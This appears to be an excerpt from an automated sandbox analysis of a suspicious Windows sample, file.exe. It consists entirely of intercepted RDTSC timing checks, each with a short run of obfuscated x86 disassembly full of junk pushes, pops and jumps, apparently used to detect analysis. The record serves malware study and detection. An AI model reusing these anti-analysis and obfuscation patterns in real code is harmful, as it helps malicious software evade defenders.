                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC3F0 second address: 5EC49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA46BC744h 0x00000011 popad 0x00000012 nop 0x00000013 add dword ptr [ebp+122D1F8Fh], ebx 0x00000019 push 00000000h 0x0000001b pushad 0x0000001c mov dword ptr [ebp+122D1C48h], edx 0x00000022 mov dword ptr [ebp+122D1C34h], esi 0x00000028 popad 0x00000029 call 00007FCBA46BC739h 0x0000002e jmp 00007FCBA46BC73Dh 0x00000033 push eax 0x00000034 jnp 00007FCBA46BC748h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jnc 00007FCBA46BC751h 0x00000044 pushad 0x00000045 jc 00007FCBA46BC736h 0x0000004b jmp 00007FCBA46BC743h 0x00000050 popad 0x00000051 mov eax, dword ptr [eax] 0x00000053 jnp 00007FCBA46BC73Eh 0x00000059 mov dword ptr [esp+04h], eax 0x0000005d jp 00007FCBA46BC744h 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC49A second address: 5EC49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC49E second address: 5EC4C3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov ch, 76h 0x00000009 push 00000003h 0x0000000b mov si, 8A00h 0x0000000f push 00000000h 0x00000011 cmc 0x00000012 movsx edx, ax 0x00000015 push 00000003h 0x00000017 movzx edi, dx 0x0000001a push A13DCAF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4C3 second address: 5EC4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4C9 second address: 5EC4CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4CF second address: 5EC4D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC4D3 second address: 5EC57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 1EC2350Ah 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FCBA46BC738h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 cld 0x0000002a lea ebx, dword ptr [ebp+1244C2DBh] 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007FCBA46BC738h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D1A4Bh], edi 0x00000050 or dword ptr [ebp+122D1A4Bh], esi 0x00000056 mov ecx, dword ptr [ebp+122D3906h] 0x0000005c xchg eax, ebx 0x0000005d pushad 0x0000005e jmp 00007FCBA46BC745h 0x00000063 jbe 00007FCBA46BC74Ch 0x00000069 jmp 00007FCBA46BC746h 0x0000006e popad 0x0000006f push eax 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jg 00007FCBA46BC736h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC5D7 second address: 5EC5DC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC5DC second address: 5EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnc 00007FCBA46BC739h 0x00000010 push 00000000h 0x00000012 jbe 00007FCBA46BC737h 0x00000018 call 00007FCBA46BC739h 0x0000001d jmp 00007FCBA46BC742h 0x00000022 push eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC619 second address: 5EC61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC61D second address: 5EC680 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC745h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jo 00007FCBA46BC74Bh 0x00000015 jmp 00007FCBA46BC745h 0x0000001a push edi 0x0000001b js 00007FCBA46BC736h 0x00000021 pop edi 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 jo 00007FCBA46BC73Eh 0x0000002b jne 00007FCBA46BC738h 0x00000031 pushad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c jg 00007FCBA46BC736h 0x00000042 popad 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC7BA second address: 5EC806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FCBA4817E85h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007FCBA4817E7Ah 0x00000016 jno 00007FCBA4817E7Ch 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jnp 00007FCBA4817E80h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EC806 second address: 5EC827 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FCBA46BC738h 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB13 second address: 60CB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA4817E85h 0x00000009 pop ebx 0x0000000a ja 00007FCBA4817E7Ch 0x00000010 jl 00007FCBA4817E78h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB44 second address: 60CB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60CB4A second address: 60CB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 jbe 00007FCBA4817E8Dh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AB0C second address: 60AB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC744h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 jns 00007FCBA46BC73Ah 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AC96 second address: 60ACA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCBA4817E76h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ACA3 second address: 60ACA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60ACA8 second address: 60ACAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AE01 second address: 60AE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AE09 second address: 60AE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AE0F second address: 60AE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FCBA46BC749h 0x0000000b ja 00007FCBA46BC736h 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jno 00007FCBA46BC736h 0x0000001f jmp 00007FCBA46BC73Bh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AE59 second address: 60AE80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jp 00007FCBA4817E76h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 jns 00007FCBA4817E76h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60AFD7 second address: 60AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60B142 second address: 60B15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60BBF7 second address: 60BBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602FBD second address: 602FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FCBA4817E82h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 602FD5 second address: 602FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E20A5 second address: 5E20E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c jmp 00007FCBA4817E83h 0x00000011 popad 0x00000012 push edx 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FCBA4817E85h 0x0000001b pop edx 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60C444 second address: 60C448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F216 second address: 60F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 60F21A second address: 60F220 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612794 second address: 612798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612C7F second address: 612C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612DA9 second address: 612DAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115A8 second address: 6115AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6115AE second address: 6115B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612E98 second address: 612EBA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCBA46BC738h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FCBA46BC73Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 612EBA second address: 612EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B50 second address: 616B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B58 second address: 616B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B5E second address: 616B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC746h 0x00000009 jo 00007FCBA46BC736h 0x0000000f popad 0x00000010 pop edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B85 second address: 616B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616CE5 second address: 616CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616E3B second address: 616E68 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCBA4817E89h 0x0000000c push edi 0x0000000d pop edi 0x0000000e jns 00007FCBA4817E76h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616E68 second address: 616E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616FDD second address: 616FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6175A1 second address: 6175AB instructions: 0x00000000 rdtsc 0x00000002 js 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D08 second address: 618D13 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FCBA4817E76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D13 second address: 618D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b js 00007FCBA46BC744h 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FCBA46BC736h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 618D2C second address: 618D42 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 or di, B341h 0x0000000c push 94D92880h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619937 second address: 619976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a mov esi, dword ptr [ebp+122D1C78h] 0x00000010 nop 0x00000011 jmp 00007FCBA46BC740h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC741h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619976 second address: 619988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619988 second address: 61998E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619B64 second address: 619B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619DA8 second address: 619DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B322 second address: 61B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61B969 second address: 61B97B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA46BC73Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C35B second address: 61C3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FCBA4817E88h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FCBA4817E78h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov esi, dword ptr [ebp+122D3922h] 0x00000032 push 00000000h 0x00000034 mov esi, 48731DDCh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C1FC second address: 61C202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C3B5 second address: 61C3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C202 second address: 61C206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61C3D2 second address: 61C3D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61E450 second address: 61E455 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CBE4 second address: 61CBE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CBE8 second address: 61CBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D4A4D second address: 5D4A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EADB second address: 61EAE1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61EAE1 second address: 61EAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F588 second address: 61F5FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov di, bx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FCBA46BC738h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007FCBA46BC745h 0x00000030 or dword ptr [ebp+122D2773h], esi 0x00000036 push 00000000h 0x00000038 jmp 00007FCBA46BC749h 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F5FE second address: 61F617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007FCBA4817E7Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621480 second address: 621510 instructions: 0x00000000 rdtsc 0x00000002 je 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCBA46BC740h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FCBA46BC738h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov esi, ebx 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000016h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a mov dword ptr [ebp+122D27EBh], ecx 0x00000050 push 00000000h 0x00000052 mov dword ptr [ebp+122D2BA9h], esi 0x00000058 xchg eax, ebx 0x00000059 jmp 00007FCBA46BC744h 0x0000005e push eax 0x0000005f js 00007FCBA46BC74Fh 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 pop eax 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620712 second address: 620716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621D93 second address: 621D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62730A second address: 627310 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627310 second address: 627380 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC73Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FCBA46BC738h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007FCBA46BC738h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov ebx, 04D39903h 0x00000048 cmc 0x00000049 jne 00007FCBA46BC738h 0x0000004f push 00000000h 0x00000051 mov dword ptr [ebp+1244DF87h], ebx 0x00000057 xchg eax, esi 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626364 second address: 626369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
